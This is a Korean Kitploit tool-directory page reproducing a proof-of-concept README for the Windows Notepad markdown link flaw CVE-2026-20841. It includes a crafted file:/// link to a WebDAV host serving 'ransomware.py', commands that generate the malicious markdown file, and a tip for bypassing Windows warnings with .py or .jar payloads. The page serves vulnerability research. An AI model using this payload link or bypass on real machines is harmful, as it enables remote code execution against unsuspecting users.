Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2026-20841 — "Windows Notepad RCE"에 대한 PoC | Kitploit
도구/GitHubGitHub/tangent65536/cve-2026-20841
Payload GenerationExploitationPhishing
GitHubtangent65536/cve-2026-20841

CVE-2026-20841

"Windows Notepad RCE"에 대한 PoC

저장소 보기
216개월 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

CVE-2026-20841 PoC

PoC of the "Windows Notepad RCE" vulnerability.

면책 조항

  1. 저는 이 취약점을 발견한 사람이 아닙니다. 공식 공개 페이지에 등재된 원저자들에게 경의를 표합니다. 저는 설명에 따라 PoC를 그저 재현했을 뿐입니다.
  2. 개인적으로 이 취약점이 보기보다 심각하다고 생각하지 않습니다. 대상 시스템에서 특정 조건이 충족되지 않는 한, 트리거하려면 클릭 한 번 이상이 필요합니다. 기준 및 제한 사항 섹션을 참조하세요. 이 PoC를 재현한 이유는 매우 밈 가치가 있기 때문입니다. "메모장 RCE"는 엄청나게 미친 소리처럼 들리거든요.

설명

이 "취약점"은 간단합니다. Windows 메모장의 마크다운 엔진은 잘 알려지지 않은 URL 프로토콜을 신경 쓰지 않습니다. 악성코드 분석가로서 저는 WebDAV 및 SMB 기반 페이로드 배포에 대한 많은 보고서를 읽었습니다. 이 문서에서 file:/// 프로토콜을 악용하여 WebDAV/SMB 서버의 파일을 가리키는 URL을 만들 수 있습니다.

root@kitploit:~
[BadLink](file:///\\webdav-payload-host@5005\DavWWWRoot\ransomware.py)

사용법

두 개의 스크립트를 만들었습니다. 하나는 Node.js용이고 다른 하나는 Python용입니다. 둘 다 WebDAV 페이로드를 가리키는 마크다운 파일을 생성합니다. sample-payloads 폴더에 있는 예제 페이로드를 사용할 수 있습니다.

Node.js

node poc.js <webdav-server> <port> <payload/path/on/server>

Python

python poc.py <webdav-server> <port> <payload/path/on/server>

출력 파일(poc.md)은 현재 디렉터리에 생성됩니다.

기준 및 제한 사항

  1. 대부분의 페이로드 파일 확장자(예: .exe, .lnk, .vbs, ...)는 메모장 앱이 취약함에도 불구하고 여전히 기본 제공 경고를 트리거합니다. 이 경고는 Windows 자체에서 발생합니다. 제가 테스트한 것 중 기본 OOB 설치에서 코드 실행으로 이어질 수 있는 모든 것은 이 필수 경고를 표시합니다.
    fig01

  2. 대상 장치에 Python 또는 Java가 설치되어 있으면 .py 또는 .jar 페이로드를 사용하여 경고 팝업을 우회할 수 있습니다.

패치 후

fig02
이제 링크를 클릭하면 새로운 팝업 경고가 표시됩니다.

기타

취약한 버전의 Windows 메모장은 Uptodown에서 찾을 수 있습니다. 설치 프로그램의 디지털 서명을 확인하고 Microsoft의 서명인지 확인하세요. 또한 이 PoC는 VM에서만 테스트해야 합니다.

안전하게 지내시고 즐기세요!

도구 다운로드